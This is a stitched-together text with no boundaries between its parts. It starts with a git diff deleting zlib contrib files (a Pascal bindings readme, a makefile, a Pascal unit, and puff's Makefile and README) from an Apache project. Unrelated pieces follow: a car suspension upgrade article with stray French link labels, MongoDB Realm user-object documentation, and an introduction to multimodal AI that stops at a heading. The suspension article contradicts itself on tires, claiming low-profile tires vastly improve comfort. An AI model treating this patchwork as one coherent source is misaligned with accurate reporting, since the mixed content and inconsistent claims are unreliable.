http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt deleted file mode 100644 index 60e87c8..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt +++ /dev/null @@ -1,76 +0,0 @@ - -This directory contains a Pascal (Delphi, Kylix) interface to the -zlib data compression library. - - -Directory listing -================= - -zlibd32.mak makefile for Borland C++ -example.pas usage example of zlib -zlibpas.pas the Pascal interface to zlib -readme.txt this file - - -Compatibility notes -=================== - -- Although the name "zlib" would have been more normal for the - zlibpas unit, this name is already taken by Borland's ZLib unit. - This is somehow unfortunate, because that unit is not a genuine - interface to the full-fledged zlib functionality, but a suite of - class wrappers around zlib streams. Other essential features, - such as checksums, are missing. - It would have been more appropriate for that unit to have a name - like "ZStreams", or something similar. - -- The C and zlib-supplied types int, uInt, long, uLong, etc. are - translated directly into Pascal types of similar sizes (Integer, - LongInt, etc.), to avoid namespace pollution. In particular, - there is no conversion of unsigned int into a Pascal unsigned - integer. The Word type is non-portable and has the same size - (16 bits) both in a 16-bit and in a 32-bit environment, unlike - Integer. Even if there is a 32-bit Cardinal type, there is no - real need for unsigned int in zlib under a 32-bit environment. - -- Except for the callbacks, the zlib function interfaces are - assuming the calling convention normally used in Pascal - (__pascal for DOS and Windows16, __fastcall for Windows32). 
- Since the cdecl keyword is used, the old Turbo Pascal does - not work with this interface. - -- The gz* function interfaces are not translated, to avoid - interfacing problems with the C runtime library. Besides, - gzprintf(gzFile file, const char *format, ...) - cannot be translated into Pascal. - - -Legal issues -============ - -The zlibpas interface is: - Copyright (C) 1995-2003 Jean-loup Gailly and Mark Adler. - Copyright (C) 1998 by Bob Dellaca. - Copyright (C) 2003 by Cosmin Truta. - -The example program is: - Copyright (C) 1995-2003 by Jean-loup Gailly. - Copyright (C) 1998,1999,2000 by Jacques Nomssi Nzali. - Copyright (C) 2003 by Cosmin Truta. - - This software is provided 'as-is', without any express or implied - warranty. In no event will the author be held liable for any damages - arising from the use of this software. - - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. - 3. This notice may not be removed or altered from any source distribution. - http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak deleted file mode 100644 index 9bb00b7..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak +++ /dev/null @@ -1,99 +0,0 @@ -# Makefile for zlib -# For use with Delphi and C++ Builder under Win32 -# Updated for zlib 1.2.x by Cosmin Truta - -# ------------ Borland C++ ------------ - -# This project uses the Delphi (fastcall/register) calling convention: -LOC = -DZEXPORT=__fastcall -DZEXPORTVA=__cdecl - -CC = bcc32 -LD = bcc32 -AR = tlib -# do not use "-pr" in CFLAGS -CFLAGS = -a -d -k- -O2 $(LOC) -LDFLAGS = - - -# variables -ZLIB_LIB = zlib.lib - -OBJ1 = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj -OBJ2 = gzwrite.obj infback.obj inffast.obj inflate.obj inftrees.obj trees.obj uncompr.obj zutil.obj -OBJP1 = +adler32.obj+compress.obj+crc32.obj+deflate.obj+gzclose.obj+gzlib.obj+gzread.obj -OBJP2 = +gzwrite.obj+infback.obj+inffast.obj+inflate.obj+inftrees.obj+trees.obj+uncompr.obj+zutil.obj - - -# targets -all: $(ZLIB_LIB) example.exe minigzip.exe - -.c.obj: - $(CC) -c $(CFLAGS) $*.c - -adler32.obj: adler32.c zlib.h zconf.h - -compress.obj: compress.c zlib.h zconf.h - -crc32.obj: crc32.c zlib.h zconf.h crc32.h - -deflate.obj: deflate.c deflate.h zutil.h zlib.h zconf.h - -gzclose.obj: gzclose.c zlib.h zconf.h gzguts.h - -gzlib.obj: gzlib.c zlib.h zconf.h gzguts.h - -gzread.obj: gzread.c zlib.h zconf.h gzguts.h - -gzwrite.obj: gzwrite.c zlib.h zconf.h gzguts.h - -infback.obj: infback.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - inffast.h inffixed.h - -inffast.obj: inffast.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - inffast.h - -inflate.obj: inflate.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - 
inffast.h inffixed.h - -inftrees.obj: inftrees.c zutil.h zlib.h zconf.h inftrees.h - -trees.obj: trees.c zutil.h zlib.h zconf.h deflate.h trees.h - -uncompr.obj: uncompr.c zlib.h zconf.h - -zutil.obj: zutil.c zutil.h zlib.h zconf.h - -example.obj: test/example.c zlib.h zconf.h - -minigzip.obj: test/minigzip.c zlib.h zconf.h - - -# For the sake of the old Borland make, -# the command line is cut to fit in the MS-DOS 128 byte limit: -$(ZLIB_LIB): $(OBJ1) $(OBJ2) - -del $(ZLIB_LIB) - $(AR) $(ZLIB_LIB) $(OBJP1) - $(AR) $(ZLIB_LIB) $(OBJP2) - - -# testing -test: example.exe minigzip.exe - example - echo hello world | minigzip | minigzip -d - -example.exe: example.obj $(ZLIB_LIB) - $(LD) $(LDFLAGS) example.obj $(ZLIB_LIB) - -minigzip.exe: minigzip.obj $(ZLIB_LIB) - $(LD) $(LDFLAGS) minigzip.obj $(ZLIB_LIB) - - -# cleanup -clean: - -del *.obj - -del *.exe - -del *.lib - -del *.tds - -del zlib.bak - -del foo.gz - http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas deleted file mode 100644 index e6a0782..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas +++ /dev/null @@ -1,276 +0,0 @@ -(* zlibpas -- Pascal interface to the zlib data compression library - * - * Copyright (C) 2003 Cosmin Truta. - * Derived from original sources by Bob Dellaca. - * For conditions of distribution and use, see copyright notice in readme.txt - *) - -unit zlibpas; - -interface - -const - ZLIB_VERSION = '1.2.8'; - ZLIB_VERNUM = $1280; - -type - alloc_func = function(opaque: Pointer; items, size: Integer): Pointer; - cdecl; - free_func = procedure(opaque, address: Pointer); - cdecl; - - in_func = function(opaque: Pointer; var buf: PByte): Integer; - cdecl; - out_func = function(opaque: Pointer; buf: PByte; size: Integer): Integer; - cdecl; - - z_streamp = ^z_stream; - z_stream = packed record - next_in: PChar; (* next input byte *) - avail_in: Integer; (* number of bytes available at next_in *) - total_in: LongInt; (* total nb of input bytes read so far *) - - next_out: PChar; (* next output byte should be put there *) - avail_out: Integer; (* remaining free space at next_out *) - total_out: LongInt; (* total nb of bytes output so far *) - - msg: PChar; (* last error message, NULL if no error *) - state: Pointer; (* not visible by applications *) - - zalloc: alloc_func; (* used to allocate the internal state *) - zfree: free_func; (* used to free the internal state *) - opaque: Pointer; (* private data object passed to zalloc and zfree *) - - data_type: Integer; (* best guess about the data type: ascii or binary *) - adler: LongInt; (* adler32 value of the uncompressed data *) - reserved: LongInt; (* reserved for future use *) - end; - - gz_headerp = ^gz_header; - gz_header = packed record - text: Integer; (* true if compressed data believed to be text *) - time: LongInt; (* modification time *) - xflags: Integer; (* extra flags (not used when writing a gzip file) *) - os: Integer; (* operating system *) - extra: PChar; (* pointer to extra field or Z_NULL if none *) - extra_len: Integer; (* extra field length (valid if extra != Z_NULL) *) - extra_max: Integer; (* space at extra (only when reading header) *) - name: PChar; (* pointer to zero-terminated file name or Z_NULL *) - name_max: 
Integer; (* space at name (only when reading header) *) - comment: PChar; (* pointer to zero-terminated comment or Z_NULL *) - comm_max: Integer; (* space at comment (only when reading header) *) - hcrc: Integer; (* true if there was or will be a header crc *) - done: Integer; (* true when done reading gzip header *) - end; - -(* constants *) -const - Z_NO_FLUSH = 0; - Z_PARTIAL_FLUSH = 1; - Z_SYNC_FLUSH = 2; - Z_FULL_FLUSH = 3; - Z_FINISH = 4; - Z_BLOCK = 5; - Z_TREES = 6; - - Z_OK = 0; - Z_STREAM_END = 1; - Z_NEED_DICT = 2; - Z_ERRNO = -1; - Z_STREAM_ERROR = -2; - Z_DATA_ERROR = -3; - Z_MEM_ERROR = -4; - Z_BUF_ERROR = -5; - Z_VERSION_ERROR = -6; - - Z_NO_COMPRESSION = 0; - Z_BEST_SPEED = 1; - Z_BEST_COMPRESSION = 9; - Z_DEFAULT_COMPRESSION = -1; - - Z_FILTERED = 1; - Z_HUFFMAN_ONLY = 2; - Z_RLE = 3; - Z_FIXED = 4; - Z_DEFAULT_STRATEGY = 0; - - Z_BINARY = 0; - Z_TEXT = 1; - Z_ASCII = 1; - Z_UNKNOWN = 2; - - Z_DEFLATED = 8; - -(* basic functions *) -function zlibVersion: PChar; -function deflateInit(var strm: z_stream; level: Integer): Integer; -function deflate(var strm: z_stream; flush: Integer): Integer; -function deflateEnd(var strm: z_stream): Integer; -function inflateInit(var strm: z_stream): Integer; -function inflate(var strm: z_stream; flush: Integer): Integer; -function inflateEnd(var strm: z_stream): Integer; - -(* advanced functions *) -function deflateInit2(var strm: z_stream; level, method, windowBits, - memLevel, strategy: Integer): Integer; -function deflateSetDictionary(var strm: z_stream; const dictionary: PChar; - dictLength: Integer): Integer; -function deflateCopy(var dest, source: z_stream): Integer; -function deflateReset(var strm: z_stream): Integer; -function deflateParams(var strm: z_stream; level, strategy: Integer): Integer; -function deflateTune(var strm: z_stream; good_length, max_lazy, nice_length, max_chain: Integer): Integer; -function deflateBound(var strm: z_stream; sourceLen: LongInt): LongInt; -function deflatePending(var strm: z_stream; var pending: Integer; var bits: Integer): Integer; -function deflatePrime(var strm: z_stream; bits, value: Integer): Integer; -function deflateSetHeader(var strm: z_stream; head: gz_header): Integer; -function inflateInit2(var strm: z_stream; windowBits: Integer): Integer; -function inflateSetDictionary(var strm: z_stream; const dictionary: PChar; - dictLength: Integer): Integer; -function inflateSync(var strm: z_stream): Integer; -function inflateCopy(var dest, source: z_stream): Integer; -function inflateReset(var strm: z_stream): Integer; -function inflateReset2(var strm: z_stream; windowBits: Integer): Integer; -function inflatePrime(var strm: z_stream; bits, value: Integer): Integer; -function inflateMark(var strm: z_stream): LongInt; -function inflateGetHeader(var strm: z_stream; var head: gz_header): Integer; -function inflateBackInit(var strm: z_stream; - windowBits: Integer; window: PChar): Integer; -function inflateBack(var strm: z_stream; in_fn: in_func; in_desc: Pointer; - out_fn: out_func; out_desc: Pointer): Integer; -function inflateBackEnd(var strm: z_stream): Integer; -function zlibCompileFlags: LongInt; - -(* utility functions *) -function compress(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: LongInt): Integer; -function compress2(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: LongInt; - level: Integer): Integer; -function compressBound(sourceLen: LongInt): LongInt; -function uncompress(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: 
LongInt): Integer; - -(* checksum functions *) -function adler32(adler: LongInt; const buf: PChar; len: Integer): LongInt; -function adler32_combine(adler1, adler2, len2: LongInt): LongInt; -function crc32(crc: LongInt; const buf: PChar; len: Integer): LongInt; -function crc32_combine(crc1, crc2, len2: LongInt): LongInt; - -(* various hacks, don't look :) *) -function deflateInit_(var strm: z_stream; level: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateInit_(var strm: z_stream; const version: PChar; - stream_size: Integer): Integer; -function deflateInit2_(var strm: z_stream; - level, method, windowBits, memLevel, strategy: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateInit2_(var strm: z_stream; windowBits: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateBackInit_(var strm: z_stream; - windowBits: Integer; window: PChar; - const version: PChar; stream_size: Integer): Integer; - - -implementation - -{$L adler32.obj} -{$L compress.obj} -{$L crc32.obj} -{$L deflate.obj} -{$L infback.obj} -{$L inffast.obj} -{$L inflate.obj} -{$L inftrees.obj} -{$L trees.obj} -{$L uncompr.obj} -{$L zutil.obj} - -function adler32; external; -function adler32_combine; external; -function compress; external; -function compress2; external; -function compressBound; external; -function crc32; external; -function crc32_combine; external; -function deflate; external; -function deflateBound; external; -function deflateCopy; external; -function deflateEnd; external; -function deflateInit_; external; -function deflateInit2_; external; -function deflateParams; external; -function deflatePending; external; -function deflatePrime; external; -function deflateReset; external; -function deflateSetDictionary; external; -function deflateSetHeader; external; -function deflateTune; external; -function inflate; external; -function inflateBack; external; -function inflateBackEnd; external; -function inflateBackInit_; external; -function inflateCopy; external; -function inflateEnd; external; -function inflateGetHeader; external; -function inflateInit_; external; -function inflateInit2_; external; -function inflateMark; external; -function inflatePrime; external; -function inflateReset; external; -function inflateReset2; external; -function inflateSetDictionary; external; -function inflateSync; external; -function uncompress; external; -function zlibCompileFlags; external; -function zlibVersion; external; - -function deflateInit(var strm: z_stream; level: Integer): Integer; -begin - Result := deflateInit_(strm, level, ZLIB_VERSION, sizeof(z_stream)); -end; - -function deflateInit2(var strm: z_stream; level, method, windowBits, memLevel, - strategy: Integer): Integer; -begin - Result := deflateInit2_(strm, level, method, windowBits, memLevel, strategy, - ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateInit(var strm: z_stream): Integer; -begin - Result := inflateInit_(strm, ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateInit2(var strm: z_stream; windowBits: Integer): Integer; -begin - Result := inflateInit2_(strm, windowBits, ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateBackInit(var strm: z_stream; - windowBits: Integer; window: PChar): Integer; -begin - Result := inflateBackInit_(strm, windowBits, window, - ZLIB_VERSION, sizeof(z_stream)); -end; - -function _malloc(Size: Integer): Pointer; cdecl; -begin - GetMem(Result, Size); -end; - -procedure _free(Block: Pointer); cdecl; -begin - FreeMem(Block); 
-end; - -procedure _memset(P: Pointer; B: Byte; count: Integer); cdecl; -begin - FillChar(P^, count, B); -end; - -procedure _memcpy(dest, source: Pointer; count: Integer); cdecl; -begin - Move(source^, dest^, count); -end; - -end. http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile deleted file mode 100644 index 0e2594c..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile +++ /dev/null @@ -1,42 +0,0 @@ -CFLAGS=-O - -puff: puff.o pufftest.o - -puff.o: puff.h - -pufftest.o: puff.h - -test: puff - puff zeros.raw - -puft: puff.c puff.h pufftest.o - cc -fprofile-arcs -ftest-coverage -o puft puff.c pufftest.o - -# puff full coverage test (should say 100%) -cov: puft - @rm -f *.gcov *.gcda - @puft -w zeros.raw 2>&1 | cat > /dev/null - @echo '04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '00 00 00 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 254 - @echo '00 01 00 fe ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '01 01 00 fe ff 0a' | xxd -r -p | puft -f 2>&1 | cat > /dev/null - @echo '02 7e ff ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '02' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '04 80 49 92 24 49 92 24 0f b4 ff ff c3 04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '04 80 49 92 24 49 92 24 71 ff ff 93 11 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 249 - @echo '04 c0 81 08 00 00 00 00 20 7f eb 0b 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '0b 00 00' | xxd -r -p | puft -f 2>&1 | cat > /dev/null - @echo '1a 07' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '0c c0 81 00 00 00 00 00 90 ff 6b 04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 245 - @puft -f zeros.raw 2>&1 | cat > /dev/null - @echo 'fc 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 253 - @echo '04 00 fe ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 252 - @echo '04 00 24 49' | xxd -r -p | puft 2> /dev/null || test $$? -eq 251 - @echo '04 80 49 92 24 49 92 24 0f b4 ff ff c3 84' | xxd -r -p | puft 2> /dev/null || test $$? -eq 248 - @echo '04 00 24 e9 ff ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 250 - @echo '04 00 24 e9 ff 6d' | xxd -r -p | puft 2> /dev/null || test $$? -eq 247 - @gcov -n puff.c - -clean: - rm -f puff puft *.o *.gc* http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README deleted file mode 100644 index bbc4cb5..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README +++ /dev/null @@ -1,63 +0,0 @@ -Puff -- A Simple Inflate -3 Mar 2003 -Mark Adler [email protected] - -What this is -- - -puff.c provides the routine puff() to decompress the deflate data format. It -does so more slowly than zlib, but the code is about one-fifth the size of the -inflate code in zlib, and written to be very easy to read. 
- -Why I wrote this -- -puff.c was written to document the deflate format unambiguously, by virtue of -being working C code. It is meant to supplement RFC 1951, which formally -describes the deflate format. I have received many questions on details of the -deflate format, and I hope that reading this code will answer those questions. -puff.c is heavily commented with details of the deflate format, especially -those little nooks and cranies of the format that might not be obvious from a -specification. - -puff.c may also be useful in applications where code size or memory usage is a -very limited resource, and speed is not as important. - -How to use it -- -Well, most likely you should just be reading puff.c and using zlib for actual -applications, but if you must ... - -Include puff.h in your code, which provides this prototype: - -int puff(unsigned char *dest, /* pointer to destination pointer */ - unsigned long *destlen, /* amount of output space */ - unsigned char *source, /* pointer to source data pointer */ - unsigned long *sourcelen); /* amount of input available */ - -Then you can call puff() to decompress a deflate stream that is in memory in -its entirety at source, to a sufficiently sized block of memory for the -decompressed data at dest. puff() is the only external symbol in puff.c The -only C library functions that puff.c needs are setjmp() and longjmp(), which -are used to simplify error checking in the code to improve readabilty. puff.c -does no memory allocation, and uses less than 2K bytes off of the stack. - -If destlen is not enough space for the uncompressed data, then inflate will -return an error without writing more than destlen bytes. Note that this means -that in order to decompress the deflate data successfully, you need to know -the size of the uncompressed data ahead of time. - -If needed, puff() can determine the size of the uncompressed data with no -output space. This is done by passing dest equal to (unsigned char *)0. Then -the initial value of *destlen is ignored and *destlen is set to the length of -the uncompressed data. So if the size of the uncompressed data is not known, -then two passes of puff() can be used--first to determine the size, and second -to do the actual inflation after allocating the appropriate memory. Not -pretty, but it works. (This is one of the reasons you should be using zlib.) - -The deflate format is self-terminating. If the deflate stream does not end -in *sourcelen bytes, puff() will return an error without reading at or past -endsource. - -On return, *sourcelen is updated to the amount of input data consumed, and -*destlen is updated to the size of the uncompressed data. See the comments -in puff.c for the possible return codes for puff().
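A rough Python analogue of the two-pass puff() usage described in the archived README, substituting the standard zlib module's raw-deflate mode (negative wbits) for the C routine itself:

```python
import zlib

# puff() inflates raw deflate data: no zlib header, no gzip wrapper.
# Python's zlib module handles the same format when wbits is negative.
compressor = zlib.compressobj(level=9, wbits=-15)   # -15 selects raw deflate
deflated = compressor.compress(b"hello, hello!") + compressor.flush()

# Equivalent in spirit to puff(dest, &destlen, source, &sourcelen):
inflated = zlib.decompress(deflated, wbits=-15)
assert inflated == b"hello, hello!"
```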
How to Improve Car Comfort with Suspension Upgrades? In the vast world of automotives, understanding the intricate dynamics of a vehicle’s suspension system can oftentimes seem overwhelming. However, you don’t need to be a mechanic or an automotive enthusiast to grasp the fundamental concepts that can help you elevate your ride’s performance and comfort. This article is a comprehensive guide that offers practical insights on how to enhance your car or truck’s solace by upgrading its suspension system. Understanding Your Vehicle’s Suspension System Before delving into the nitty-gritty of suspension upgrades, it’s essential to understand the role of a vehicle’s suspension system itself. This network of components including springs, shocks, struts, and tires works in unison to absorb bumps and vibrations from the road, providing you and your passengers with a smooth ride. It also helps in maintaining contact between the tires and the road, ensuring optimal vehicle handling and safety. Sujet a lire : What’s the Role of a Fuel Additive in Engine Care? While comfort might be the primary concern for many, a well-tuned suspension system also contributes significantly to the overall performance and handling of your vehicle. It aids in braking, maintaining road contact, and limiting the impact and wear on your vehicle. Why Upgrade the Suspension? Now, you might be wondering—why should you consider upgrading your vehicle’s suspension system? Well, a standard suspension system that comes with your car or truck is designed to provide a balance between comfort and performance. However, it may not cater to your specific needs or preferences, especially if you use your vehicle for special purposes like off-roading, towing, or racing. En parallèle : Can Upgrading Mirrors Enhance Side Visibility? Upgrading your suspension can help you customize your vehicle’s ride to your liking. Whether you want a smoother ride, better handling, increased ground clearance, or enhanced load-carrying capacity, a suspension upgrade could be the solution. Remember: The best suspension upgrade is the one that meets your unique needs and preferences. Choosing the Right Suspension Upgrade Components Choosing the right components for your suspension upgrade is crucial to achieving your desired results. Here, we’ll discuss a few key components—springs, shocks, and tires—and how choosing the right ones can help improve your vehicle’s comfort and performance. Springs Springs are instrumental in absorbing the shocks and bumps from the road. A stiffer spring will reduce body roll and improve handling but might result in a harsher ride. On the other hand, softer springs can enhance ride comfort but might compromise on handling. Therefore, you must strike a balance based on your needs. Shocks Shock absorbers, or simply shocks, dampen the movement of springs to prevent continuous bouncing after a bump. Upgrading to high-performance shocks can help improve your vehicle’s stability, handling, and comfort. Tires Tires are the only point of contact between your vehicle and the road. Therefore, they play a critical role in your vehicle’s performance and comfort. Upgrading to high-quality, comfort-oriented tires with appropriate tread patterns can significantly enhance your ride’s smoothness and comfort. The Process of Suspension Upgrades Upgrading your vehicle’s suspension is not a simple plug-and-play operation. It requires careful consideration, planning, and often professional help. 
It is crucial to be aware that suspension modifications can impact other aspects of your vehicle, including the alignment, braking, and stability. The process typically begins with identifying your specific needs and choosing the right components. Once you have the components, you can start with the installation process. While some upgrades like changing the springs or shocks can be done with a basic mechanic toolset, others might require professional assistance. Remember: A suspension upgrade is a significant modification and should always be done keeping safety as a priority. The Impact of Suspension Upgrades on Your Vehicle While the primary aim of a suspension upgrade is to boost comfort and performance, it’s important to note that it can also have other impacts on your vehicle. A well-executed suspension upgrade can enhance your vehicle’s look, increase its resale value, improve fuel efficiency, and even extend its longevity. However, it’s essential to remember that suspension upgrades may also come with a few downsides. For instance, they can potentially void your vehicle’s warranty, require additional maintenance, and may not always result in the expected improvement. Therefore, always carefully weigh the pros and cons before deciding to upgrade your vehicle’s suspension. In the end, whether to upgrade the suspension system of your car or truck or not is a personal decision. It largely depends on your unique needs, preferences, and budget. However, with careful planning and the right choices, suspension upgrades can indeed be a game-changer that significantly enhances your vehicle’s comfort and performance. Knowing the Types of Suspension Upgrades To fully grasp the concept of improving your car’s comfort with suspension upgrades, it’s vital to know the various types of suspension systems that you can opt for. The ideal system depends on your car type, your specific needs, and your budget. Here we highlight some of the most common suspension upgrades. Leaf Springs Leaf springs are one of the oldest types of suspension components, typically found in trucks and SUVs. They are robust and can handle heavy loads, making them ideal for off-road driving or towing. Upgrading to heavy-duty leaf springs can improve ride quality, especially when carrying heavy loads. Shock Absorbers and Struts Shock absorbers and struts are integral parts of the suspension system that help maintain ride comfort. They minimize the impact of road irregularities, thereby enhancing the driving experience. Upgrading to high-performance shocks and struts can provide better vehicle stability and improved ride comfort. Lowering Springs and Air Suspension Lowering springs and air suspension systems can alter your vehicle’s ride height. Lowering springs reduce the center of gravity, improving handling and giving your car a sporty look. On the other hand, air suspension allows you to adjust the ride height as per your preference, offering superior ride quality. Sway Bars Sway bars, also known as anti-roll bars, are used to reduce body roll during cornering. Upgrading to adjustable sway bars can help fine-tune your vehicle’s handling characteristics, thereby enhancing your driving experience. Tires As mentioned before, high-quality, low-profile tires with suitable tread patterns can vastly improve your ride’s comfort. When upgrading your car suspension, remember: Each upgrade should align with your specific needs and preferences to ensure an enhanced driving experience. Conclusion: Is a Suspension Upgrade Worth It? 
To wrap up, improving your car's comfort with suspension upgrades involves understanding your vehicle's suspension system, identifying your specific needs, choosing the right components, and installing them correctly. From leaf springs to shocks and struts, to lowering springs and air suspension, to sway bars and comfort-oriented tires, the options are vast and varied.

The benefits of a suspension upgrade can be significant, including improved ride quality, better handling, increased ground clearance, and greater load-carrying capacity. Additionally, it can enhance your vehicle's aesthetics, boost its resale value, and potentially improve fuel efficiency. But it's also important to be aware of the potential downsides, such as the risk of voiding the vehicle's warranty or necessitating additional maintenance. As with all significant modifications, a suspension upgrade deserves careful consideration and planning.

In the end, the decision to upgrade your vehicle's suspension is a personal one, largely dependent on your unique needs, preferences, and budget. With meticulous planning and the right choices, however, upgrading your vehicle's suspension can significantly improve its comfort and performance, provided it is done wisely and responsibly.
User Objects

Overview

MongoDB Realm represents each application user internally with a User Object that includes a unique ID and additional metadata that describes the user. You can access user objects in several ways.

Schema

User objects have the following form:

{
  "id": "<Unique User ID>",
  "type": "<User Type>",
  "data": {
    "<Metadata Field>": <Value>,
    ...
  },
  "custom_data": {
    "<Custom Data Field>": <Value>,
    ...
  },
  "identities": [
    {
      "id": <Unique Identity ID>,
      "provider_type": "<Authentication Provider>",
      "data": {
        "<Metadata Field>": <Value>,
        ...
      }
    }
  ]
}

id (string): A string representation of the ObjectId that uniquely identifies the user.

type (string): The type of the user. The following types are possible:
• "normal": The user is an application user logged in through an authentication provider other than the API Key provider.
• "server": The user is a server process logged in with any type of Realm API Key.
• "system": The user is the system user that bypasses all rules.

data (document): A document that contains metadata that describes the user. This field combines the data for all identities associated with the user, so the exact field names and values depend on which authentication providers the user has authenticated with.

Note: System Functions Have No User Data. In system functions, the user.data object is empty. Use context.runningAsSystem() to test if the function is running as a system user.

custom_data (document): A document from your application's custom user data collection whose user ID field matches this user's ID. You can use the custom user data collection to store arbitrary data about your application's users. If you set the name field, Realm populates the username metadata field with the return value of name. Realm automatically fetches a new copy of the data whenever a user refreshes their access token, such as when they log in. The underlying data is a regular MongoDB document, so you can use standard CRUD operations through the MongoDB Atlas service to define and modify the user's custom data.

Note: Avoid Storing Large Custom User Data. Custom user data is limited to 16 MB, the maximum size of a MongoDB document. To avoid hitting this limit, consider storing small and relatively static user data in each custom user data document, such as the user's preferred language or the URL of their avatar image. For data that is large, unbounded, or frequently updated, consider only storing a reference to the data in the custom user document, or storing the data with a reference to the user's ID rather than in the custom user document.

identities (array): A list of authentication provider identities associated with the user. When a user first logs in with a specific provider, Realm associates the user with an identity object that contains a unique identifier and additional metadata about the user from the provider. For subsequent logins, Realm refreshes the existing identity data but does not create a new identity. Identity objects have the following form:

{
  "id": "<Unique ID>",
  "provider_type": "<Provider Name>",
  "data": {
    "<Metadata Field>": <Value>,
    ...
  }
}

• id: A provider-generated string that uniquely identifies this identity.
• provider_type: The type of authentication provider associated with this identity.
• data: Additional metadata from the authentication provider that describes the user. The exact field names and values will vary depending on which authentication providers the user has logged in with.
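Because custom user data is stored in an ordinary MongoDB collection, it can be managed with the standard CRUD operations the custom_data description above mentions. Below is a minimal PyMongo sketch that upserts and reads one user's custom data document. The connection string, database and collection names, and the user_id linking field are placeholder assumptions; the actual values depend on how custom user data is configured for your Realm app.

```python
from typing import Optional

from pymongo import MongoClient

# Placeholder connection string and names; substitute your deployment's values.
client = MongoClient("mongodb+srv://user:pass@cluster0.example.mongodb.net")
custom_data = client["my_app_db"]["custom_user_data"]

def set_preferred_language(user_id: str, language: str) -> None:
    """Upsert one small, relatively static field in the user's custom data document."""
    custom_data.update_one(
        {"user_id": user_id},  # assumed name of the configured "user ID field"
        {"$set": {"preferred_language": language}},
        upsert=True,
    )

def get_custom_data(user_id: str) -> Optional[dict]:
    """Fetch the document Realm exposes as user.custom_data after a token refresh."""
    return custom_data.find_one({"user_id": user_id})

set_preferred_language("some-user-id", "fr")
print(get_custom_data("some-user-id"))
```

Keeping only small fields like a preferred language in this document respects the 16 MB limit discussed in the note above.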
For a provider-specific breakdown of user identity data, see User Metadata.

Note: In general, MongoDB Realm creates a user object for a given user the first time that they authenticate. If you create a test Email/Password user through the Realm UI, Realm creates that user's user object immediately.

Summary

• The user object contains relevant information about the user that you can use in your app logic.
• The exact information contained in the user object depends on the authentication providers used.
What Is Multimodal In AI Training?

What is multimodal AI? It's an intriguing concept in the field of artificial intelligence, focusing on teaching AI systems to comprehend and analyze diverse forms of data. This data spans different mediums such as text, images, audio, and video. The goal? To develop AI that can mimic human cognition, enabling it to perceive, learn, and interpret the world in a more holistic manner.

Imagine a person learning about cats. They might read about cats, look at pictures, listen to the sounds cats make, and watch videos of cats in action. All these different pieces of information help the person understand what a cat is. Multimodal AI training aims to achieve a similar level of understanding by combining different forms of data.

Why Do We Need Multimodal AI?

